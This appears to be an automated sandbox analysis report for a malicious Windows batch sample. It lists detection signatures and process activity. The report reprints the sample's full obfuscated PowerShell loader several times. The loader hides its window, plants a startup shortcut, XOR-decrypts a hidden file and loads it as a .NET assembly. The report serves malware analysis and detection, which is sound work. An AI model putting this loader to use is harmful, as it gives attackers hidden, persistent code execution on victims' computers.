Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report iqfpdjey.cmd

Overview

General Information

Sample Name:iqfpdjey.cmd
Analysis ID:326339
MD5:ebc549adacb4bd69742227f9b4d06b30
SHA1:17a8eaca90e42e5c6b494e6586a8d1e66d8e9dc3
SHA256:97375803f9b120384077a144306e792d7f5a71e358f34161b2cf9a42d10d009e

Most interesting Screenshot:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Powershell creates an autostart link
Suspicious command line found
Suspicious powershell command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Script Run in AppData
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 6028 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\iqfpdjey.cmd' ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 68 cmdline: cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • powershell.exe (PID: 5852 cmdline: powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}' MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: PowerShell Script Run in AppDataShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}', CommandLine: cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: powershell.exe, 00000003.00000002.238836309.0000029B7F460000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.228175750.0000029B65424000.00000004.00000020.sdmpString found in binary or memory: http://crl.v
Source: powershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.229490765.0000029B675FB000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.229189779.0000029B673F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.229490765.0000029B675FB000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.229490765.0000029B675FB000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEEA30EFA3_2_00007FFAEEA30EFA
Source: classification engineClassification label: mal52.winCMD@6/5@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20201203Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zi4nuspm.wae.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\iqfpdjey.cmd' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation:

barindex
Suspicious command line foundShow sources
Source: unknownProcess created: cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
Source: C:\Windows\System32\cmd.exeProcess created: cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad 